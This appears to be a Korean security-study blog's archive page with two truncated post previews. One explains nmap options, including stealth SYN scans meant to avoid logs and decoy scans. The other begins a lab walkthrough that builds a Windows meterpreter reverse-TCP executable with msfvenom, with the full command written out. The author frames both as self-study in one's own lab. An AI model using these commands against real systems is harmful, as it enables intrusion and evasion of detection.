목록2016/11/13 (2)
삽이 부서질 때까지 삽질
nmap은 사이트에 실행해보면 바로 해킹으로 간주해서 은팔찌입니다.자기 스스로 환경 구축해서 실험하세요. 포트 스캔을 통해서 정보를 수집해보겠습니다. nmap -sP [ip]ping을 사용하여 대상 호스트가 살아있는지 확인 nmap -O [ip]IP의 운영체제를 확인합니다. nmap -sS [IP]스텔스 스캔을 합니다. 이 방식은 3 way handshaking 을 완료하지 않고 syn을 보내고 syn/ack 이 오면 rst를 보내 호스트 open 을 판단하여 로그를 남기지 않으려고 연결을 중단시키는 옵션입니다. nmap -D RND:[num] [IP]num 만큼 랜덤한 ip를 생성하여 패킷을 전송합니다. 상대방에게 가짜 ip를 섞어서 보냄으로 분석하기 힘들게 합니다. -D 옵션 사용 전 -D 옵션 사용..
메타스플로잇을 공부하면서 이것저것 해보는데 정리할 겸 글을 쓰면서 할게요.해당 글을 보시고 제작하여 공격하시면 안됩니다.공격해서 은팔찌 차면... 어디까지나 공부 목적으로 하세요. 타겟은 window 7 x64 입니다 먼저 자신의 내부 IP 주소를 확인 합니다.그래야 제것과 타겟을 연결하겠죠?? msfvenom을 사용해서 제작할거라 먼저 목록을 봅니다. 타겟은 windows 이기 때문에 다른 것을 안보려고 grep으로 windows 만 잡았습니다. msfvenom -l 드디어 msfvenom을 이용해서 제작을 합니다. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.182.138 lport=4444 -f exe > /root/Desktop/w..